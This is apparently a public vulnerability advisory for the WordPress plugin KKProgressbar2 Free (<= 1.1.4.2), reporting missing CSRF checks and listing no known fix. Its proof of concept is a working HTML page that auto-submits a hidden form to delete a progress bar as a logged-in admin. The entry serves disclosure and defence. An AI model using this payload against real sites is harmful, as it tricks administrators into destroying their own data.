WordPress Plugin Vulnerabilities

KKProgressbar2 Free <= 1.1.4.2 - Progress Bar Deletion via CSRF

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML file containing (where `<<ID>>` is a valid ID):

```
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
        <input type="hidden" name="action" value="delete-project">
        <input type="hidden" name="id" value="<<ID>>">
    </form>
</body>
```

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2024-05-06 (about 1 months ago)
Added
2024-05-06 (about 1 months ago)
Last Updated
2024-05-06 (about 1 months ago)

Other